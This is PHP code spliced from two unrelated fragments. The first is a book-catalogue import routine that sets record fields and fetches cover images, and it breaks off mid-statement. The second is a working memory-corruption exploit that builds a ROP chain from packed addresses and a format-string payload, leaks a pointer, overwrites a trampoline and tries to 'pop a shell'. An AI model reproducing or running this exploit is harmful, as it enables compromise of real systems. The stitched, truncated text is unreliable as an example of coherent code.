$book->impressions = 0;
     $book->clicks = 0;
 }
 if (overwrite($book, $opts, 't')) {
     $book->title = $fields[$opts['t']];
 }
 if (overwrite($book, $opts, 'a')) {
     $book->author = $fields[$opts['a']];
 }
 if (overwrite($book, $opts, 'p')) {
     $book->publisher = $fields[$opts['p']];
 }
 if (overwrite($book, $opts, 'i')) {
     $book->imageUrl = IMG_URL_PREFIX . $fields[$opts['i']];
 }
 if (overwrite($book, $opts, 'u')) {
     $book->url = $fields[$opts['u']];
 }
 $book->save();
 print "  [{$book->title}] by [{$book->author}]\n";
 // Grab the image unless we already have it
 $fileName = ORIG_FILE_PREFIX . "{$sku}.jpg";
 $thumbName = THUMB_PREFIX . "{$sku}.jpg";
 if (file_exists($fileName)) {
     $haveFile = true;
 } else {
     $haveFile = false;
     $img = util_fetchUrl($book->imageUrl);
     if ($img !== false) {
         // Dump the image to a file
         $file = fopen($fileName, "w");
// used to leak a pointer and also to store ROP chain
$payload_1 = $leak_str . "XXXX" . $stack_pivot_1 . pack("L", 0x80f0bb7) . pack("L", 0x814491f) . pack("L", 0x806266d) . pack("L", 0x84891fd) . pack("L", 0x807114c) . pack("L", 0xfffffff5) . pack("L", 0x81818de) . pack("L", 0x81b5faa);
// int 0x80
// used to trigger the exploit once we've patched everything
$payload_2 = "XXXX" . "XXXX" . "X" . str_repeat("%d", 13) . "%Z";
// trigger the exploit
// leak a pointer
echo "> Attempting to leak a pointer\n";
$data = trigger($payload_1);
$trampoline_ptr = (int) hexdec(explode("w00t", $data)[1]) + $trampoline_offset;
echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n";
// If there are any null bytes or percent signs in the pointer, it will break
// the -0x10 will be applied later, so do it now too
if (strpos(pack("L", $trampoline_ptr - 0x10), "") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) {
    echo "> That pointer has a bad character in it\n";
    echo "> This won't work.  Bailing out... :(\n";
    exit(0);
}
echo "> Overwriting payload with calculated offsets\n";
// prepare the trampoline
// code looks kinda like...
//   mov eax, [eax+0x10]
//   mov eax, [eax+0x54]
//   call eax
overwrite(2, pack("L", $trampoline_ptr - 0x10), 0);
overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset);
// exploit
echo "> Attempting to pop a shell\n";
trigger($payload_2);
// if we make it here, something didn't work
echo "> Exploit failed :(\n";